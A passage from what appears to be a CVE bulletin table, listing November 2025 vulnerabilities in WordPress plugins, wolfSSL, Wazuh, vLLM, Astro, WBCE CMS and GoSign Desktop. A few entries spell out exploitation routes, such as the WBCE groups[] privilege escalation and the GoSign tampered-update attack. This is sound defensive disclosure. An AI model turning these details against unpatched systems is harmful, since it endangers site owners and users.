| Syed Balkhi--Giveaways and Contests by RafflePress | Cross-Site Request Forgery (CSRF) vulnerability in Syed Balkhi Giveaways and Contests by RafflePress rafflepress allows Cross Site Request Forgery.This issue affects Giveaways and Contests by RafflePress: from n/a through <= 1.12.20. | 2025-11-21 | not yet calculated | CVE-2025-66064 | https://vdp.patchstack.com/database/Wordpress/Plugin/rafflepress/vulnerability/wordpress-giveaways-and-contests-by-rafflepress-plugin-1-12-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |
| theme funda--Show Variations as Single Products Woocommerce | Missing Authorization vulnerability in theme funda Show Variations as Single Products Woocommerce woo-show-single-variations-shop-category allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Show Variations as Single Products Woocommerce: from n/a through <= 2.0. | 2025-11-21 | not yet calculated | CVE-2025-66114 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-show-single-variations-shop-category/vulnerability/wordpress-show-variations-as-single-products-woocommerce-plugin-2-0-broken-access-control-vulnerability?_s_id=cve   |
| ThemeAtelier--Better Chat Support for Messenger | Missing Authorization vulnerability in ThemeAtelier Better Chat Support for Messenger better-chat-support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Chat Support for Messenger: from n/a through <= 1.2.18. | 2025-11-21 | not yet calculated | CVE-2025-66113 | https://vdp.patchstack.com/database/Wordpress/Plugin/better-chat-support/vulnerability/wordpress-better-chat-support-for-messenger-plugin-1-2-18-broken-access-control-vulnerability?_s_id=cve   |
| ThemeAtelier--Chat Help | Missing Authorization vulnerability in ThemeAtelier Chat Help chat-help allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chat Help: from n/a through <= 3.1.3. | 2025-11-21 | not yet calculated | CVE-2025-66099 | https://vdp.patchstack.com/database/Wordpress/Plugin/chat-help/vulnerability/wordpress-chat-help-plugin-3-1-3-broken-access-control-vulnerability?_s_id=cve   |
| Themeisle--PPOM for WooCommerce | Missing Authorization vulnerability in Themeisle PPOM for WooCommerce woocommerce-product-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PPOM for WooCommerce: from n/a through <= 33.0.16. | 2025-11-21 | not yet calculated | CVE-2025-66069 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-product-addon/vulnerability/wordpress-ppom-for-woocommerce-plugin-33-0-16-broken-access-control-vulnerability?_s_id=cve   |
| Times Software--E-Payroll | Value provided in one of POST parameters sent during the process of logging in to Times Software E-Payroll is not sanitized properly, which allows an unauthenticated attacker to perform DoS attacks. SQL injection attacks might also be feasible, although so far creating a working exploit has been prevented probably by backend filtering mechanisms. Additionally, command injection attempts cause the application to return extensive error messages disclosing some information about the internal infrastructure.  Patching status is unknown because the vendor has not replied to messages sent by the CNA. | 2025-11-18 | not yet calculated | CVE-2025-9977 | https://cert.pl/en/posts/2025/11/CVE-2025-9977 https://www.timesoftsg.com.sg/payroll-software/   |
| Tinexta InfoCert S.p.A.--GoSign Desktop | GoSign Desktop versions 2.4.0 and earlier use an unsigned update manifest for distributing application updates. The manifest contains package URLs and SHA-256 hashes but is not digitally signed, so its authenticity relies solely on the underlying TLS channel. In affected versions, TLS certificate validation can be disabled when a proxy is configured, allowing an attacker who can intercept network traffic to supply a malicious update manifest and corresponding package with a matching hash. This can cause the client to download and install a tampered update, resulting in arbitrary code execution with the privileges of the GoSign Desktop user on Windows and macOS, or with elevated privileges on some Linux deployments. A local attacker who can modify proxy settings may also abuse this behavior to escalate privileges by forcing installation of a crafted update. | 2025-11-18 | not yet calculated | CVE-2025-34324 | https://www.ush.it/2025/11/14/multiple-vulnerabilities-gosign-desktop-remote-code-execution/ https://infocert.digital/consumer/gosign-suite/ https://www.vulncheck.com/advisories/gosign-desktop-insecure-update-mechanism-rce https://www.ush.it/2025/11/14/vulnerabilita-multiple-gosign-desktop-esecuzione-remota-codice-arbitrario/   |
| TP-Link System Inc.--TL-WR940N V6 | Improper input validation vulnerability in TP-Link System Inc. TL-WR940N V6 (UPnP modules), which allows unauthenticated adjacent attackers to perform DoS attack. This issue affects TL-WR940N V6 <= Build 220801. | 2025-11-20 | not yet calculated | CVE-2025-11676 | https://www.tp-link.com/us/support/download/tl-wr940n/v6/#Firmware https://www.tp-link.com/en/support/download/tl-wr940n/v6/#Firmware https://www.tp-link.com/en/support/faq/4755/   |
| tychesoftwares--Arconix Shortcodes | Missing Authorization vulnerability in tychesoftwares Arconix Shortcodes arconix-shortcodes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Arconix Shortcodes: from n/a through <= 2.1.18. | 2025-11-21 | not yet calculated | CVE-2025-66085 | https://vdp.patchstack.com/database/Wordpress/Plugin/arconix-shortcodes/vulnerability/wordpress-arconix-shortcodes-plugin-2-1-18-broken-access-control-vulnerability?_s_id=cve   |
| tychesoftwares--Custom Order Numbers for WooCommerce | Missing Authorization vulnerability in tychesoftwares Custom Order Numbers for WooCommerce custom-order-numbers-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Custom Order Numbers for WooCommerce: from n/a through <= 1.11.0. | 2025-11-21 | not yet calculated | CVE-2025-66071 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-order-numbers-for-woocommerce/vulnerability/wordpress-custom-order-numbers-for-woocommerce-plugin-1-11-0-broken-access-control-vulnerability?_s_id=cve   |
| Uncanny Owl--Uncanny Automator | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Uncanny Owl Uncanny Automator uncanny-automator allows Retrieve Embedded Sensitive Data.This issue affects Uncanny Automator: from n/a through < 6.10.0. | 2025-11-21 | not yet calculated | CVE-2025-66056 | https://vdp.patchstack.com/database/Wordpress/Plugin/uncanny-automator/vulnerability/wordpress-uncanny-automator-plugin-6-10-0-sensitive-data-exposure-vulnerability?_s_id=cve   |
| Unknown--attention-bar | The attention-bar WordPress plugin through 0.7.2.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing high privilege users such as administrator to perform SQL injection attacks | 2025-11-20 | not yet calculated | CVE-2025-12502 | https://wpscan.com/vulnerability/75e63134-4c8a-45fd-b7fc-db40644ddb8c/   |
| Unknown--Mstoreapp Mobile App | The Mstoreapp Mobile App WordPress plugin through 2.08 and Mstoreapp Mobile Multivendor through 9.0.1 do not properly verify users identify when using an AJAX action, allowing unauthenticated users to retrieve a valid session for arbitrary users by knowing their email address. | 2025-11-21 | not yet calculated | CVE-2025-11127 | https://wpscan.com/vulnerability/6432bd1a-6e44-4a3f-890b-df2bd877d626/   |
| Unknown--W3 Total Cache | The W3 Total Cache WordPress plugin before 2.8.13 is vulnerable to command injection via the _parse_dynamic_mfunc function, allowing unauthenticated users to execute PHP commands by submitting a comment with a malicious payload to a post. | 2025-11-17 | not yet calculated | CVE-2025-9501 | https://wpscan.com/vulnerability/6697a2c9-63ae-42f0-8931-f2e5d67d45ae/   |
| Unknown--WavePlayer | The WavePlayer WordPress plugin before 3.8.0 does not have authorization in an AJAX action as well as does not validate the file to be copied locally, allowing unauthenticated users to upload arbitrary file on the server and lead to RCE | 2025-11-19 | not yet calculated | CVE-2025-12057 | https://wpscan.com/vulnerability/110db433-01ec-47ea-b74f-c3faa1757a3c/   |
| upKeeper Solutions--upKeeper Manager | Insertion of Sensitive Information into Log File vulnerability in upKeeper Solutions upKeeper Manager allows Use of Known Domain Credentials.This issue affects upKeeper Manager: from 5.2.0 before 5.2.12. | 2025-11-19 | not yet calculated | CVE-2025-11446 | https://support.upkeeper.se/hc/en-us/articles/23693858370076-CVE-2025-11446-Insertion-of-Sensitive-Information-into-Log-File   |
| Vivotek--Affected device model numbers are FD7131-VVTK,FD7131-VVTK,FD7131-VVTK,FD7141-VVTK,IP7131-VVTK,IP7133-VVTK,IP7133-VVTK,IP7133-VVTK,IP7134-VVTK,IP7135-VVTK,IP7135-VVTK,IP7135-VVTK,IP7135-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7138-VVTK,IP7142-VVTK,IP7142-VVTK,IP7151-VVTK,IP7152-VVTK,IP7153-VVTK,IP7153-VVTK,IP7154-VVTK,IP7330-VVTK,IP7330-VVTK,IP7330-VVTK,IP8131-VVTK,IP8131-VVTK,IP8131-VVTK,IP8131W-VVTK,PT7135-VVTK,PT7137-TCON,PT7137-VVTK,PT7137-VVTK,PT7137-VVTK,PT7137-VVTK,PZ7131-VVTK,PZ7131-VVTK,PZ71X1-VVTK,PZ71X1-VVTK,PZ71X2-VVTK,SD73X3-VVTK,SD73X3-VVTK,SD73X3-VVTK,TC5330-VVTK,TC5332-TCVV,TC5333-TCVV,TC5633-TCVV,TC5633-VVTK,VS7100-VVTK,VS7100-VVTK,VS7100-VVTK | Legacy Vivotek Device firmware uses default credetials for the root and user login accounts. | 2025-11-19 | not yet calculated | CVE-2025-12592 | https://www.akamai.com/blog/security-research/rce-zero-day-in-legacy-vivotek-firmware http://www.vapidlabs.com/advisory.php?v=219   |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, users can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with correct ndim but incorrect shape (e.g. hidden dimension is wrong), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page). This issue has been patched in version 0.11.1. | 2025-11-21 | not yet calculated | CVE-2025-62372 | https://github.com/vllm-project/vllm/security/advisories/GHSA-pmqf-x6x8-p7qw https://github.com/vllm-project/vllm/pull/27204 https://github.com/vllm-project/vllm/pull/6613 https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b   |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.3.0 to before 4.13.0, a missing ACL on "C:\Program Files (x86)\ossec-agent\authd.pass" exposes the password to all "Authenticated Users" on the local machine. This issue has been patched in version 4.13.0. | 2025-11-21 | not yet calculated | CVE-2025-54866 | https://github.com/wazuh/wazuh/security/advisories/GHSA-mvfx-ph7m-qm37 https://github.com/wazuh/wazuh/pull/31187 https://github.com/wazuh/wazuh/commit/606f19e688944ebe5d28d72eb81ac36f8fffb143 https://github.com/wazuh/wazuh/releases/tag/v4.13.0   |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 3.7.0 to before 4.12.0, fim_alert() implementation does not check whether oldsum->md5 is NULL or not before dereferencing it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. This issue has been patched in version 4.12.0. | 2025-11-21 | not yet calculated | CVE-2025-64169 | https://github.com/wazuh/wazuh/security/advisories/GHSA-hc35-h924-8596   |
| wazuh--wazuh-dashboard-plugins | Wazuh is a security detection, visibility, and compliance open source project. From version 4.9.0 to before 4.13.0, the Wazuh API - Agent Configuration in certain configurations allows authenticated users with read-only API roles to retrieve agent enrollment credentials through the /utils/configuration endpoint. These credentials can be used to register new agents within the same Wazuh tenant without requiring elevated permissions through the UI. This issue has been patched in version 4.13.0. | 2025-11-21 | not yet calculated | CVE-2025-64483 | https://github.com/wazuh/wazuh-dashboard-plugins/security/advisories/GHSA-gwf3-8gm3-qrmj   |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. Prior to version 1.6.4, a low-privileged user in WBCE CMS can escalate their privileges to the Administrators group by manipulating the groups[] parameter in the /admin/users/save.php request. The UI restricts users to assigning only their existing group, but server-side validation is missing, allowing attackers to overwrite their group membership and obtain full administrative access. This results in a complete compromise of the CMS. This issue has been patched in version 1.6.4. | 2025-11-19 | not yet calculated | CVE-2025-65094 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-hmmw-4ccm-fx44 https://github.com/WBCE/WBCE_CMS/commit/96046178f4c80cf16f7c224054dec7fdadddda7e   |
| WebToffee--Accessibility Toolkit by WebYes | Missing Authorization vulnerability in WebToffee Accessibility Toolkit by WebYes accessibility-plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accessibility Toolkit by WebYes: from n/a through <= 2.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66112 | https://vdp.patchstack.com/database/Wordpress/Plugin/accessibility-plus/vulnerability/wordpress-accessibility-toolkit-by-webyes-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve   |
| WebToffee--Product Feed for WooCommerce | Missing Authorization vulnerability in WebToffee Product Feed for WooCommerce webtoffee-product-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Feed for WooCommerce: from n/a through <= 2.3.1. | 2025-11-21 | not yet calculated | CVE-2025-66089 | https://vdp.patchstack.com/database/Wordpress/Plugin/webtoffee-product-feed/vulnerability/wordpress-product-feed-for-woocommerce-plugin-2-3-1-broken-access-control-vulnerability?_s_id=cve   |
| withastro--astro | Astro is a web framework. Prior to version 5.15.8, a mismatch exists between how Astro normalizes request paths for routing/rendering and how the application's middleware reads the path for validation checks. Astro internally applies decodeURI() to determine which route to render, while the middleware uses context.url.pathname without applying the same normalization (decodeURI). This discrepancy may allow attackers to reach protected routes using encoded path variants that pass routing but bypass validation checks. This issue has been patched in version 5.15.8. | 2025-11-19 | not yet calculated | CVE-2025-64765 | https://github.com/withastro/astro/security/advisories/GHSA-ggxq-hp9w-j794 https://github.com/withastro/astro/commit/6f800813516b07bbe12c666a92937525fddb58ce   |
| wofSSL--wolfSSL | Improper Input Validation in the TLS 1.3 CKS extension parsing in wolfSSL 5.8.2 and earlier on multiple platforms allows a remote unauthenticated attacker to potentially cause a denial-of-service via a crafted ClientHello message with duplicate CKS extensions. | 2025-11-21 | not yet calculated | CVE-2025-11933 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9132   |
| wolfSSL--wolfSSL | Integer Underflow Leads to Out-of-Bounds Access in XChaCha20-Poly1305 Decrypt. This issue is hit specifically with a call to the function wc_XChaCha20Poly1305_Decrypt() which is not used with TLS connections, only from direct calls from an application. | 2025-11-21 | not yet calculated | CVE-2025-11931 | https://github.com/wolfSSL/wolfssl/pull/9223   |
| wolfSSL--wolfSSL | The server previously verified the TLS 1.3 PSK binder using a non-constant time method which could potentially leak information about the PSK binder | 2025-11-21 | not yet calculated | CVE-2025-11932 | https://github.com/wolfSSL/wolfssl/pull/9223   |
| wolfSSL--wolfSSL | Improper input validation in the TLS 1.3 CertificateVerify signature algorithm negotiation in wolfSSL 5.8.2 and earlier on multiple platforms allows for downgrading the signature algorithm used. For example when a client sends ECDSA P521 as the supported signature algorithm the server previously could respond as ECDSA P256 being the accepted signature algorithm and the connection would continue with using ECDSA P256, if the client supports ECDSA P256. | 2025-11-21 | not yet calculated | CVE-2025-11934 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9113   |
| wolfSSL--wolfSSL | With TLS 1.3 pre-shared key (PSK) a malicious or faulty server could ignore the request for PFS (perfect forward secrecy) and the client would continue on with the connection using PSK without PFS. This happened when a server responded to a ClientHello containing psk_dhe_ke without a key_share extension. The re-use of an authenticated PSK connection that on the clients side unexpectedly did not have PFS, reduces the security of the connection. | 2025-11-21 | not yet calculated | CVE-2025-11935 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9112   |
| wolfSSL--wolfSSL | Improper input validation in the TLS 1.3 KeyShareEntry parsing in wolfSSL v5.8.2 on multiple platforms allows a remote unauthenticated attacker to cause a denial-of-service by sending a crafted ClientHello message containing duplicate KeyShareEntry values for the same supported group, leading to excessive CPU and memory consumption during ClientHello processing. | 2025-11-21 | not yet calculated | CVE-2025-11936 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9117   |
| wolfSSL--wolfSSL | Vulnerability in X25519 constant-time cryptographic implementations due to timing side channels introduced by compiler optimizations and CPU architecture limitations, specifically with the Xtensa-based ESP32 chips. If targeting Xtensa it is recommended to use the low memory implementations of X25519, which is now turned on as the default for Xtensa. | 2025-11-21 | not yet calculated | CVE-2025-12888 | https://https://github.com/wolfSSL/wolfssl/pull/9275   |
| wolfSSL--wolfSSL | With TLS 1.2 connections a client can use any digest, specifically a weaker digest that is supported, rather than those in the CertificateRequest. | 2025-11-21 | not yet calculated | CVE-2025-12889 | https://github.com/wolfSSL/wolfssl/pull/9395   |
| workos--authkit-nextjs | The AuthKit library for Next.js provides convenient helpers for authentication and session management using WorkOS & AuthKit with Next.js. In authkit-nextjs version 2.11.0 and below, authenticated responses do not defensively apply anti-caching headers. In environments where CDN caching is enabled, this can result in session tokens being included in cached responses and subsequently served to multiple users. Next.js applications deployed on Vercel are unaffected unless they manually enable CDN caching by setting cache headers on authenticated paths. Patched in authkit-nextjs 2.11.1, which applies anti-caching headers to all responses behind authentication. | 2025-11-21 | not yet calculated | CVE-2025-64762 | https://github.com/workos/authkit-nextjs/security/advisories/GHSA-p8pf-44ff-93gf https://github.com/workos/authkit-nextjs/commit/94cf438124993abb0e7c19dac64c3cb5724a15ea https://github.com/workos/authkit-nextjs/releases/tag/v2.11.1   |
| WP Legal Pages--WP Cookie Notice for GDPR, CCPA & ePrivacy Consent | Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent gdpr-cookie-consent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through <= 4.0.3. | 2025-11-21 | not yet calculated | CVE-2025-66075 | https://vdp.patchstack.com/database/Wordpress/Plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-3-broken-access-control-vulnerability?_s_id=cve   |
| wpWax--Legal Pages | Missing Authorization vulnerability in wpWax Legal Pages legal-pages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Legal Pages: from n/a through <= 1.4.6. | 2025-11-21 | not yet calculated | CVE-2025-66077 | https://vdp.patchstack.com/database/Wordpress/Plugin/legal-pages/vulnerability/wordpress-legal-pages-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve   |
請即與我們聯絡: fix@hk-computer-repair.com
有用連結:
